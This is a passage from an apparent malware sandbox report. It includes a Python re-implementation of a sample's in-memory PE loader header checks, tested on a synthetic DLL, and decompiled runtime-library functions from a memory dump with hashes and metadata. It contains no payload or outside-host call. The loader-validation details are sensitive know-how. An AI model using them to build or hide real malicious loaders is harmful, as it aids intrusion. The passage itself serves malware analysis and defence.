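        raise LoaderError(ERROR_INVALID_DATA)


def validate_image(data, page_size=0x1000):
    """Run the checks E0074F6A7 performs before VirtualAlloc and return what
    the loader derives from the headers. page_size stands in for the
    dwPageSize GetNativeSystemInfo returns (assumed 0x1000 here)."""
    size = len(data)
    check_size(size, 0x40)                       # sizeof(IMAGE_DOS_HEADER)
    if data[:2] != b"MZ":
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    nt = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    check_size(size, nt + SIZEOF_IMAGE_NT_HEADERS32)
    if data[nt:nt + 4] != b"PE\0\0":
        raise LoaderError(ERROR_BAD_EXE_FORMAT)
    machine, nsections = struct.unpack_from("<HH", data, nt + 4)
    opt_size, characteristics = struct.unpack_from("<HH", data, nt + 0x14)
    entry_point = struct.unpack_from("<I", data, nt + 0x28)[0]
    image_base, section_align = struct.unpack_from("<II", data, nt + 0x34)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, nt + 0x50)
    if machine != IMAGE_FILE_MACHINE_I386 or section_align & 1:
        raise LoaderError(ERROR_BAD_EXE_FORMAT)  # x86 only, even alignment
    # Loop at 0x0074f72f: end of each section is VirtualAddress + SizeOfRawData,
    # or + SectionAlignment when SizeOfRawData is zero; keep the maximum.
    last_section_end = 0
    sec = nt + 0x18 + opt_size                   # IMAGE_FIRST_SECTION
    for _ in range(nsections):
        va, raw_size = struct.unpack_from("<II", data, sec + 0x0C)
        last_section_end = max(last_section_end, va + (raw_size or section_align))
        sec += SIZEOF_SECTION_HEADER
    aligned_image = align_up(size_of_image, page_size)
    if aligned_image != align_up(last_section_end, page_size):
        raise LoaderError(ERROR_BAD_EXE_FORMAT)  # SizeOfImage disagrees with sections
    check_size(size, size_of_headers)            # headers are memcpy'd next
    return {
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "image_base": image_base,
        "aligned_image_size": aligned_image,
        "size_of_headers": size_of_headers,
        "entry_point": entry_point,
        "sections": nsections,
    }


def loader_error_code(data):
    """Win32 error code validate_image would set, or None when it accepts."""
    try:
        validate_image(data)
    except LoaderError as err:
        return err.code
    return None


def build_sample_dll(machine=IMAGE_FILE_MACHINE_I386, size_of_image=0x3000):
    """Constructed minimal PE32 DLL with one section (synthetic, not a real file)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0,
                           IMAGE_FILE_DLL | 0x0002)               # one section, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)                    # AddressOfEntryPoint
    struct.pack_into("<III", opt, 0x1C, 0x10000000, 0x1000, 0x200)  # ImageBase, Section/FileAlignment
    struct.pack_into("<II", opt, 0x38, size_of_image, 0x200)     # SizeOfImage, SizeOfHeaders
    # .text: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x2000,
                          0x200, 0, 0, 0, 0, 0x60000020)
    return (dos + b"PE\0\0" + file_hdr + bytes(opt) + section).ljust(0x200, b"\0")


if __name__ == "__main__":
    print(validate_image(build_sample_dll()))
    print(hex(loader_error_code(build_sample_dll(machine=0x8664))))
```

Pointing validate_image at a dumped blob (for instance the 0x740000 region from the memory dump listed under Memory Dump Source, or a camera module carved from it) reproduces the loader's accept/reject decision without executing anything; a 0xc1 result on a 64-bit image is the same outcome the sample would hit at label L2.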

                      C-Code - Quality: 73%
                      			E0077E550(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v36;
                      				signed int _v40;
                      				intOrPtr _v44;
                      				signed int _v56;
                      				char _v276;
                      				short _v278;
                      				short _v280;
                      				char _v448;
                      				signed int _v452;
                      				signed int _v456;
                      				short _v458;
                      				intOrPtr _v460;
                      				intOrPtr _v464;
                      				signed int _v468;
                      				signed int _v472;
                      				intOrPtr _v508;
                      				char _v536;
                      				signed int _v540;
                      				intOrPtr _v544;
                      				signed int _v556;
                      				char _v708;
                      				signed int _v712;
                      				signed int _v716;
                      				short _v718;
                      				signed int* _v720;
                      				signed int _v724;
                      				signed int _v728;
                      				signed int _v732;
                      				signed int* _v736;
                      				signed int _v740;
                      				signed int _v744;
                      				signed int _v748;
                      				signed int _v752;
                      				char _v820;
                      				char _v1248;
                      				char _v1256;
                      				intOrPtr _v1276;
                      				signed int _v1292;
                      				signed int _t241;
                      				void* _t244;
                      				signed int _t247;
                      				signed int _t249;
                      				signed int _t255;
                      				signed int _t256;
                      				signed int _t257;
                      				signed int _t258;
                      				signed int _t259;
                      				signed int _t261;
                      				signed int _t263;
                      				void* _t265;
                      				signed int _t266;
                      				signed int _t267;
                      				signed int _t268;
                      				signed int _t270;
                      				signed int _t273;
                      				signed int _t280;
                      				signed int _t281;
                      				signed int _t282;
                      				intOrPtr _t283;
                      				signed int _t286;
                      				signed int _t290;
                      				signed int _t291;
                      				intOrPtr _t293;
                      				signed int _t296;
                      				signed int _t297;
                      				signed int _t299;
                      				signed int _t319;
                      				signed int _t320;
                      				signed int _t323;
                      				signed int _t328;
                      				void* _t330;
                      				signed int _t332;
                      				void* _t333;
                      				intOrPtr _t334;
                      				signed int _t339;
                      				signed int _t340;
                      				intOrPtr* _t343;
                      				signed int _t357;
                      				signed int _t359;
                      				signed int _t361;
                      				intOrPtr* _t362;
                      				signed int _t364;
                      				signed int _t370;
                      				intOrPtr* _t374;
                      				intOrPtr* _t377;
                      				void* _t380;
                      				intOrPtr* _t381;
                      				intOrPtr* _t382;
                      				signed int _t393;
                      				signed int _t396;
                      				intOrPtr* _t397;
                      				signed int _t399;
                      				signed int* _t403;
                      				intOrPtr* _t410;
                      				intOrPtr* _t411;
                      				signed int _t421;
                      				short _t422;
                      				void* _t424;
                      				signed int _t425;
                      				signed int _t427;
                      				intOrPtr _t428;
                      				signed int _t431;
                      				intOrPtr _t432;
                      				signed int _t434;
                      				signed int _t437;
                      				intOrPtr _t443;
                      				signed int _t444;
                      				signed int _t446;
                      				signed int _t447;
                      				signed int _t450;
                      				signed int _t452;
                      				signed int _t456;
                      				signed int* _t457;
                      				intOrPtr* _t458;
                      				short _t459;
                      				void* _t461;
                      				signed int _t463;
                      				signed int _t465;
                      				void* _t467;
                      				void* _t468;
                      				void* _t470;
                      				signed int _t471;
                      				void* _t472;
                      				void* _t474;
                      				signed int _t475;
                      				void* _t477;
                      				void* _t479;
                      				intOrPtr _t491;
                      
                      				_t420 = __edx;
                      				_t461 = _t467;
                      				_t468 = _t467 - 0xc;
                      				_push(__ebx);
                      				_push(__esi);
                      				_v12 = 1;
                      				_t357 = E0077F98C(__ecx, 0x6a6);
                      				_t240 = 0;
                      				_pop(_t370);
                      				if(_t357 == 0) {
                      					L20:
                      					return _t240;
                      				} else {
                      					_push(__edi);
                      					_t2 = _t357 + 4; // 0x4
                      					_t427 = _t2;
                      					 *_t427 = 0;
                      					 *_t357 = 1;
                      					_t443 = _a4;
                      					_t4 = _t443 + 0x30; // 0x77dd4f
                      					_t241 = _t4;
                      					_push( *_t241);
                      					_v16 = _t241;
                      					_push(0x797498);
                      					_push( *0x797354);
                      					E0077E48F(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                      					_t470 = _t468 + 0x18;
                      					_v8 = 0x797354;
                      					while(1) {
                      						L2:
                      						_t244 = E00788207(_t427, 0x351, ";");
                      						_t471 = _t470 + 0xc;
                      						if(_t244 != 0) {
                      							break;
                      						} else {
                      							_t8 = _v16 + 0x10; // 0x10
                      							_t410 = _t8;
                      							_t339 =  *_v16;
                      							_v16 = _t410;
                      							_t411 =  *_t410;
                      							goto L4;
                      						}
                      						while(1) {
                      							L4:
                      							_t420 =  *_t339;
                      							if(_t420 !=  *_t411) {
                      								break;
                      							}
                      							if(_t420 == 0) {
                      								L8:
                      								_t340 = 0;
                      							} else {
                      								_t420 =  *((intOrPtr*)(_t339 + 2));
                      								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                      									break;
                      								} else {
                      									_t339 = _t339 + 4;
                      									_t411 = _t411 + 4;
                      									if(_t420 != 0) {
                      										continue;
                      									} else {
                      										goto L8;
                      									}
                      								}
                      							}
                      							L10:
                      							asm("sbb eax, eax");
                      							_t370 = _v8 + 0xc;
                      							_v8 = _t370;
                      							_v12 = _v12 &  !( ~_t340);
                      							_t343 = _v16;
                      							_v16 = _t343;
                      							_push( *_t343);
                      							_push(0x797498);
                      							_push( *_t370);
                      							E0077E48F(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                      							_t470 = _t471 + 0x18;
                      							if(_v8 < 0x797384) {
                      								goto L2;
                      							} else {
                      								if(_v12 != 0) {
                      									E007801F5(_t357);
                      									_t31 = _t443 + 0x28; // 0x30ff068b
                      									_t434 = _t427 | 0xffffffff;
                      									__eflags =  *_t31;
                      									if(__eflags != 0) {
                      										asm("lock xadd [ecx], eax");
                      										if(__eflags == 0) {
                      											_t32 = _t443 + 0x28; // 0x30ff068b
                      											E007801F5( *_t32);
                      										}
                      									}
                      									_t33 = _t443 + 0x24; // 0x30ff0c46
                      									__eflags =  *_t33;
                      									if( *_t33 != 0) {
                      										asm("lock xadd [eax], edi");
                      										__eflags = _t434 == 1;
                      										if(_t434 == 1) {
                      											_t34 = _t443 + 0x24; // 0x30ff0c46
                      											E007801F5( *_t34);
                      										}
                      									}
                      									 *(_t443 + 0x24) = 0;
                      									 *(_t443 + 0x1c) = 0;
                      									 *(_t443 + 0x28) = 0;
                      									 *((intOrPtr*)(_t443 + 0x20)) = 0;
                      									_t39 = _t443 + 0x40; // 0x10468b00
                      									_t240 =  *_t39;
                      								} else {
                      									_t20 = _t443 + 0x28; // 0x30ff068b
                      									_t437 = _t427 | 0xffffffff;
                      									_t491 =  *_t20;
                      									if(_t491 != 0) {
                      										asm("lock xadd [ecx], eax");
                      										if(_t491 == 0) {
                      											_t21 = _t443 + 0x28; // 0x30ff068b
                      											E007801F5( *_t21);
                      										}
                      									}
                      									_t22 = _t443 + 0x24; // 0x30ff0c46
                      									if( *_t22 != 0) {
                      										asm("lock xadd [eax], edi");
                      										if(_t437 == 1) {
                      											_t23 = _t443 + 0x24; // 0x30ff0c46
                      											E007801F5( *_t23);
                      										}
                      									}
                      									 *(_t443 + 0x24) =  *(_t443 + 0x24) & 0x00000000;
                      									_t26 = _t357 + 4; // 0x4
                      									_t240 = _t26;
                      									 *(_t443 + 0x1c) =  *(_t443 + 0x1c) & 0x00000000;
                      									 *(_t443 + 0x28) = _t357;
                      									 *((intOrPtr*)(_t443 + 0x20)) = _t240;
                      								}
                      								goto L20;
                      							}
                      							goto L130;
                      						}
                      						asm("sbb eax, eax");
                      						_t340 = _t339 | 0x00000001;
                      						__eflags = _t340;
                      						goto L10;
                      					}
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					E0077698A();
                      					asm("int3");
                      					_push(_t461);
                      					_t463 = _t471;
                      					_t472 = _t471 - 0x1d0;
                      					_t247 =  *0x7aa00c; // 0x67a7e35e
                      					_v56 = _t247 ^ _t463;
                      					_t249 = _v40;
                      					_push(_t357);
                      					_push(_t443);
                      					_t444 = _v36;
                      					_push(_t427);
                      					_t428 = _v44;
                      					_v508 = _t428;
                      					__eflags = _t249;
                      					if(_t249 == 0) {
                      						_v456 = 1;
                      						_v468 = 0;
                      						_t359 = 0;
                      						_v452 = 0;
                      						__eflags = _t444;
                      						if(__eflags == 0) {
                      							L79:
                      							E0077E550(_t359, _t370, _t420, _t428, _t444, __eflags, _t428);
                      							goto L80;
                      						} else {
                      							__eflags =  *_t444 - 0x4c;
                      							if( *_t444 != 0x4c) {
                      								L58:
                      								_push(0);
                      								_t255 = E0077E118(_t359, _t420, _t428, _t444, _t444,  &_v276, 0x83,  &_v448, 0x55);
                      								_t474 = _t472 + 0x18;
                      								__eflags = _t255;
                      								if(_t255 != 0) {
                      									_t370 = 0;
                      									__eflags = 0;
                      									_t76 = _t428 + 0x20; // 0x77dd3f
                      									_t421 = _t76;
                      									_t446 = 0;
                      									_v452 = _t421;
                      									do {
                      										__eflags = _t446;
                      										if(_t446 == 0) {
                      											L73:
                      											_t256 = _v456;
                      										} else {
                      											_t374 =  *_t421;
                      											_t257 =  &_v276;
                      											while(1) {
                      												__eflags =  *_t257 -  *_t374;
                      												_t428 = _v464;
                      												if( *_t257 !=  *_t374) {
                      													break;
                      												}
                      												__eflags =  *_t257;
                      												if( *_t257 == 0) {
                      													L66:
                      													_t370 = 0;
                      													_t258 = 0;
                      												} else {
                      													_t422 =  *((intOrPtr*)(_t257 + 2));
                      													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
                      													_v458 = _t422;
                      													_t421 = _v452;
                      													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
                      														break;
                      													} else {
                      														_t257 = _t257 + 4;
                      														_t374 = _t374 + 4;
                      														__eflags = _v458;
                      														if(_v458 != 0) {
                      															continue;
                      														} else {
                      															goto L66;
                      														}
                      													}
                      												}
                      												L68:
                      												__eflags = _t258;
                      												if(_t258 == 0) {
                      													_t359 = _t359 + 1;
                      													__eflags = _t359;
                      													goto L73;
                      												} else {
                      													_t259 =  &_v276;
                      													_push(_t259);
                      													_push(_t446);
                      													_push(_t428);
                      													L83();
                      													_t421 = _v452;
                      													_t474 = _t474 + 0xc;
                      													__eflags = _t259;
                      													if(_t259 == 0) {
                      														_t370 = 0;
                      														_t256 = 0;
                      														_v456 = 0;
                      													} else {
                      														_t359 = _t359 + 1;
                      														_t370 = 0;
                      														goto L73;
                      													}
                      												}
                      												goto L74;
                      											}
                      											asm("sbb eax, eax");
                      											_t258 = _t257 | 0x00000001;
                      											_t370 = 0;
                      											__eflags = 0;
                      											goto L68;
                      										}
                      										L74:
                      										_t446 = _t446 + 1;
                      										_t421 = _t421 + 0x10;
                      										_v452 = _t421;
                      										__eflags = _t446 - 5;
                      									} while (_t446 <= 5);
                      									__eflags = _t256;
                      									if(__eflags != 0) {
                      										goto L79;
                      									} else {
                      										__eflags = _t359;
                      										goto L77;
                      									}
                      								}
                      								goto L80;
                      							} else {
                      								__eflags =  *(_t444 + 2) - 0x43;
                      								if( *(_t444 + 2) != 0x43) {
                      									goto L58;
                      								} else {
                      									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
                      									if( *((short*)(_t444 + 4)) != 0x5f) {
                      										goto L58;
                      									} else {
                      										while(1) {
                      											_t261 = E00789367(_t444, 0x797490);
                      											_t361 = _t261;
                      											_v472 = _t361;
                      											_pop(_t376);
                      											__eflags = _t361;
                      											if(_t361 == 0) {
                      												break;
                      											}
                      											_t263 = _t261 - _t444;
                      											__eflags = _t263;
                      											_v456 = _t263 >> 1;
                      											if(_t263 == 0) {
                      												break;
                      											} else {
                      												_t265 = 0x3b;
                      												__eflags =  *_t361 - _t265;
                      												if( *_t361 == _t265) {
                      													break;
                      												} else {
                      													_t431 = _v456;
                      													_t362 = 0x797354;
                      													_v460 = 1;
                      													do {
                      														_t266 = E0078932D( *_t362, _t444, _t431);
                      														_t472 = _t472 + 0xc;
                      														__eflags = _t266;
                      														if(_t266 != 0) {
                      															goto L45;
                      														} else {
                      															_t377 =  *_t362;
                      															_t420 = _t377 + 2;
                      															do {
                      																_t334 =  *_t377;
                      																_t377 = _t377 + 2;
                      																__eflags = _t334 - _v468;
                      															} while (_t334 != _v468);
                      															_t376 = _t377 - _t420 >> 1;
                      															__eflags = _t431 - _t377 - _t420 >> 1;
                      															if(_t431 != _t377 - _t420 >> 1) {
                      																goto L45;
                      															}
                      														}
                      														break;
                      														L45:
                      														_v460 = _v460 + 1;
                      														_t362 = _t362 + 0xc;
                      														__eflags = _t362 - 0x797384;
                      													} while (_t362 <= 0x797384);
                      													_t359 = _v472 + 2;
                      													_t267 = E007892DD(_t376, _t359, ";");
                      													_t428 = _v464;
                      													_t447 = _t267;
                      													_pop(_t380);
                      													__eflags = _t447;
                      													if(_t447 != 0) {
                      														L48:
                      														__eflags = _v460 - 5;
                      														if(_v460 > 5) {
                      															_t268 = _v452;
                      															goto L54;
                      														} else {
                      															_push(_t447);
                      															_t270 = E00788349(_t380,  &_v276, 0x83, _t359);
                      															_t475 = _t472 + 0x10;
                      															__eflags = _t270;
                      															if(_t270 != 0) {
                      																L82:
                      																_push(0);
                      																_push(0);
                      																_push(0);
                      																_push(0);
                      																_push(0);
                      																E0077698A();
                      																asm("int3");
                      																_push(_t463);
                      																_t465 = _t475;
                      																_t273 =  *0x7aa00c; // 0x67a7e35e
                      																_v556 = _t273 ^ _t465;
                      																_push(_t359);
                      																_t364 = _v540;
                      																_push(_t447);
                      																_push(_t428);
                      																_t432 = _v544;
                      																_v1292 = _t364;
                      																_v1276 = E00781CE2(_t364, _t380, _t420) + 0x278;
                      																_push( &_v1256);
                      																_t280 = E0077E118(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                      																_t477 = _t475 - 0x2e4 + 0x18;
                      																__eflags = _t280;
                      																if(_t280 != 0) {
                      																	_t101 = _t364 + 2; // 0x6
                      																	_t450 = _t101 << 4;
                      																	__eflags = _t450;
                      																	_t281 =  &_v280;
                      																	_v724 = _t450;
                      																	_t381 =  *((intOrPtr*)(_t450 + _t432));
                      																	while(1) {
                      																		_v712 = _v712 & 0x00000000;
                      																		__eflags =  *_t281 -  *_t381;
                      																		_t452 = _v724;
                      																		if( *_t281 !=  *_t381) {
                      																			break;
                      																		}
                      																		__eflags =  *_t281;
                      																		if( *_t281 == 0) {
                      																			L91:
                      																			_t282 = _v712;
                      																		} else {
                      																			_t459 =  *((intOrPtr*)(_t281 + 2));
                      																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
                      																			_v718 = _t459;
                      																			_t452 = _v724;
                      																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
                      																				break;
                      																			} else {
                      																				_t281 = _t281 + 4;
                      																				_t381 = _t381 + 4;
                      																				__eflags = _v718;
                      																				if(_v718 != 0) {
                      																					continue;
                      																				} else {
                      																					goto L91;
                      																				}
                      																			}
                      																		}
                      																		L93:
                      																		__eflags = _t282;
                      																		if(_t282 != 0) {
                      																			_t382 =  &_v280;
                      																			_t424 = _t382 + 2;
                      																			do {
                      																				_t283 =  *_t382;
                      																				_t382 = _t382 + 2;
                      																				__eflags = _t283 - _v712;
                      																			} while (_t283 != _v712);
                      																			_v728 = (_t382 - _t424 >> 1) + 1;
                      																			_t286 = E0077F98C(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
                      																			_v740 = _t286;
                      																			__eflags = _t286;
                      																			if(_t286 == 0) {
                      																				goto L84;
                      																			} else {
                      																				_v732 =  *((intOrPtr*)(_t452 + _t432));
                      																				_t125 = _t364 * 4; // 0xb94f
                      																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
                      																				_t128 = _t432 + 8; // 0x8b56ff8b
                      																				_v748 =  *_t128;
                      																				_t391 =  &_v280;
                      																				_v720 = _t286 + 4;
                      																				_t290 = E007815D4(_t286 + 4, _v728,  &_v280);
                      																				_t479 = _t477 + 0xc;
                      																				__eflags = _t290;
                      																				if(_t290 != 0) {
                      																					_t291 = _v712;
                      																					_push(_t291);
                      																					_push(_t291);
                      																					_push(_t291);
                      																					_push(_t291);
                      																					_push(_t291);
                      																					E0077698A();
                      																					asm("int3");
                      																					_t293 =  *0x7ab508; // 0x0
                      																					return _t293;
                      																				} else {
                      																					__eflags = _v280 - 0x43;
                      																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
                      																					if(_v280 != 0x43) {
                      																						L102:
                      																						_t296 = E0077DE25(_t364, _t391, _t432,  &_v708);
                      																						_t393 = _v712;
                      																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
                      																					} else {
                      																						__eflags = _v278;
                      																						if(_v278 != 0) {
                      																							goto L102;
                      																						} else {
                      																							_t393 = _v712;
                      																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
                      																						}
                      																					}
                      																					__eflags = _t364 - 2;
                      																					if(_t364 != 2) {
                      																						__eflags = _t364 - 1;
                      																						if(_t364 != 1) {
                      																							__eflags = _t364 - 5;
                      																							if(_t364 == 5) {
                      																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
                      																							}
                      																						} else {
                      																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
                      																						}
                      																					} else {
                      																						_t457 = _v736;
                      																						_t425 = _t393;
                      																						_t403 = _t457;
                      																						 *(_t432 + 8) = _v716;
                      																						_v720 = _t457;
                      																						_v728 = _t457[8];
                      																						_v716 = _t457[9];
                      																						while(1) {
                      																							_t154 = _t432 + 8; // 0x8b56ff8b
                      																							__eflags =  *_t154 -  *_t403;
                      																							if( *_t154 ==  *_t403) {
                      																								break;
                      																							}
                      																							_t458 = _v720;
                      																							_t425 = _t425 + 1;
                      																							_t328 =  *_t403;
                      																							 *_t458 = _v728;
                      																							_v716 = _t403[1];
                      																							_t403 = _t458 + 8;
                      																							 *((intOrPtr*)(_t458 + 4)) = _v716;
                      																							_t364 = _v752;
                      																							_t457 = _v736;
                      																							_v728 = _t328;
                      																							_v720 = _t403;
                      																							__eflags = _t425 - 5;
                      																							if(_t425 < 5) {
                      																								continue;
                      																							} else {
                      																							}
                      																							L110:
                      																							__eflags = _t425 - 5;
                      																							if(__eflags == 0) {
                      																								_t178 = _t432 + 8; // 0x8b56ff8b
                      																								_t319 = E007893AC(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x797410, 0x7f,  &_v536,  *_t178, 1);
                      																								_t479 = _t479 + 0x1c;
                      																								__eflags = _t319;
                      																								_t320 = _v712;
                      																								if(_t319 == 0) {
                      																									_t457[1] = _t320;
                      																								} else {
                      																									do {
                      																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
                      																										_t320 = _t320 + 1;
                      																										__eflags = _t320 - 0x7f;
                      																									} while (_t320 < 0x7f);
                      																									_t323 = E007737C1( &_v536,  *0x7aa170, 0xfe);
                      																									_t479 = _t479 + 0xc;
                      																									__eflags = _t323;
                      																									_t457[1] = 0 | _t323 == 0x00000000;
                      																								}
                      																								_t193 = _t432 + 8; // 0x8b56ff8b
                      																								 *_t457 =  *_t193;
                      																							}
                      																							 *(_t432 + 0x18) = _t457[1];
                      																							goto L121;
                      																						}
                      																						__eflags = _t425;
                      																						if(_t425 != 0) {
                      																							 *_t457 =  *(_t457 + _t425 * 8);
                      																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
                      																							 *(_t457 + _t425 * 8) = _v728;
                      																							 *(_t457 + 4 + _t425 * 8) = _v716;
                      																						}
                      																						goto L110;
                      																					}
                      																					L121:
                      																					_t297 = _t364 * 0xc;
                      																					_t200 = _t297 + 0x797350; // 0x74dd8c
                      																					 *0x793474(_t432);
                      																					_t299 =  *((intOrPtr*)( *_t200))();
                      																					_t396 = _v732;
                      																					__eflags = _t299;
                      																					if(_t299 == 0) {
                      																						__eflags = _t396 - 0x7aa2a8;
                      																						if(_t396 != 0x7aa2a8) {
                      																							_t456 = _t364 + _t364;
                      																							__eflags = _t456;
                      																							asm("lock xadd [eax], ecx");
                      																							if(_t456 != 0) {
                      																								goto L126;
                      																							} else {
                      																								_t218 = _t456 * 8; // 0x30ff068b
                      																								E007801F5( *((intOrPtr*)(_t432 + _t218 + 0x28)));
                      																								_t221 = _t456 * 8; // 0x30ff0c46
                      																								E007801F5( *((intOrPtr*)(_t432 + _t221 + 0x24)));
                      																								_t224 = _t364 * 4; // 0xb94f
                      																								E007801F5( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
                      																								_t399 = _v712;
                      																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
                      																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
                      																							}
                      																						}
                      																						_t397 = _v740;
                      																						 *_t397 = 1;
                      																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
                      																					} else {
                      																						 *(_v724 + _t432) = _t396;
                      																						_t205 = _t364 * 4; // 0xb94f
                      																						E007801F5( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
                      																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
                      																						E007801F5(_v740);
                      																						 *(_t432 + 8) = _v748;
                      																						goto L84;
                      																					}
                      																					goto L85;
                      																				}
                      																			}
                      																		} else {
                      																			goto L85;
                      																		}
                      																		goto L130;
                      																	}
                      																	asm("sbb eax, eax");
                      																	_t282 = _t281 | 0x00000001;
                      																	__eflags = _t282;
                      																	goto L93;
                      																} else {
                      																	L84:
                      																	__eflags = 0;
                      																	L85:
                      																	__eflags = _v16 ^ _t465;
                      																	return E0076FD1B(_v16 ^ _t465);
                      																}
                      															} else {
                      																_t330 = _t447 + _t447;
                      																__eflags = _t330 - 0x106;
                      																if(_t330 >= 0x106) {
                      																	E0076FE4F();
                      																	goto L82;
                      																} else {
                      																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                      																	_t332 =  &_v276;
                      																	_push(_t332);
                      																	_push(_v460);
                      																	_push(_t428);
                      																	L83();
                      																	_t472 = _t475 + 0xc;
                      																	__eflags = _t332;
                      																	_t268 = _v452;
                      																	if(_t332 != 0) {
                      																		_t268 = _t268 + 1;
                      																		_v452 = _t268;
                      																	}
                      																	L54:
                      																	_t444 = _t359 + _t447 * 2;
                      																	_t370 = 0;
                      																	__eflags =  *_t444;
                      																	if( *_t444 == 0) {
                      																		L56:
                      																		__eflags = _t268;
                      																		L77:
                      																		if(__eflags != 0) {
                      																			goto L79;
                      																		} else {
                      																		}
                      																		goto L80;
                      																	} else {
                      																		_t444 = _t444 + 2;
                      																		__eflags =  *_t444;
                      																		if( *_t444 != 0) {
                      																			continue;
                      																		} else {
                      																			goto L56;
                      																		}
                      																	}
                      																}
                      															}
                      														}
                      													} else {
                      														_t333 = 0x3b;
                      														__eflags =  *_t359 - _t333;
                      														if( *_t359 != _t333) {
                      															break;
                      														} else {
                      															goto L48;
                      														}
                      													}
                      												}
                      											}
                      											goto L130;
                      										}
                      										goto L80;
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						__eflags = _t444;
                      						if(_t444 != 0) {
                      							_push(_t444);
                      							_push(_t249);
                      							_push(_t428);
                      							L83();
                      						}
                      						L80:
                      						__eflags = _v12 ^ _t463;
                      						return E0076FD1B(_v12 ^ _t463);
                      					}
                      				}
                      				L130:
                      			}

                      Instruction address column of the disassembly view for this function (0x0077e550 to 0x0077ed9f); the instruction text the addresses annotated is not part of this extraction.

                      APIs
                        • Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE
                      • _free.LIBCMT ref: 0077E65B
                      • _free.LIBCMT ref: 0077E672
                      • _free.LIBCMT ref: 0077E691
                      • _free.LIBCMT ref: 0077E6AC
                      • _free.LIBCMT ref: 0077E6C3
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$AllocHeap
                      • String ID:
                      • API String ID: 1835388192-0
                      • Opcode ID: 0dc7461e461bceb360ac69ae88e1d2444ac7583112a8f6d3d9a1a1c9e2a084ce
                      • Instruction ID: cad71c5cb9a1dc9e91e5e890fec84bf2ce1ac83f1b04efac3c9d1b1dd049e867
                      • Opcode Fuzzy Hash: 0dc7461e461bceb360ac69ae88e1d2444ac7583112a8f6d3d9a1a1c9e2a084ce
                      • Instruction Fuzzy Hash: AF51B171A40708EFDF24DF29DC41A6A77F4EF58760B1485A9E90DDB250E739E911CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			// Appends one encoded pointer to a growable array bounded by three encoded pointers
                      			// {start, next free, end}. The layout and growth policy match the CRT's onexit-table
                      			// registration routine; that identification is an interpretation, the report does not name the function.
                      			E0077D66D(signed int* __ecx, signed int __edx) {
                      				signed int _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				signed int _t28;
                      				signed int _t29;
                      				intOrPtr _t33;
                      				signed int _t37;
                      				signed int _t38;
                      				signed int _t40;
                      				void* _t50;
                      				signed int _t56;
                      				intOrPtr* _t57;
                      				signed int _t68;
                      				signed int _t71;
                      				signed int _t72;
                      				signed int _t74;
                      				signed int _t75;
                      				signed int _t78;
                      				signed int _t80;
                      				signed int* _t81;
                      				signed int _t85;
                      				void* _t86;
                      
                      				_t72 = __edx;
                      				_v12 = __ecx; // __ecx points at a pair of argument pointers: [0] -> table pointer, [4] -> value to register
                      				_t28 =  *__ecx;
                      				_t81 =  *_t28; // the table: three entries, each stored encoded
                      				if(_t81 != 0) {
                      					_t29 =  *0x7aa00c; // 0x67a7e35e, process-wide encoding key
                      					_t56 =  *_t81 ^ _t29; // entry 0: start of the 4-byte slot array
                      					_t78 = _t81[1] ^ _t29; // entry 1: next free slot
                      					_t83 = _t81[2] ^ _t29; // entry 2: one past the last slot
                      					asm("ror edi, cl"); // decode = XOR with the key, then rotate right by the count in cl
                      					asm("ror esi, cl");
                      					asm("ror ebx, cl");
                      					if(_t78 != _t83) { // a free slot exists: skip the growth path
                      						L14:
                      						 *_t78 = E0077D52E( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4))))); // store the value reached through the second argument, encoded, in the free slot
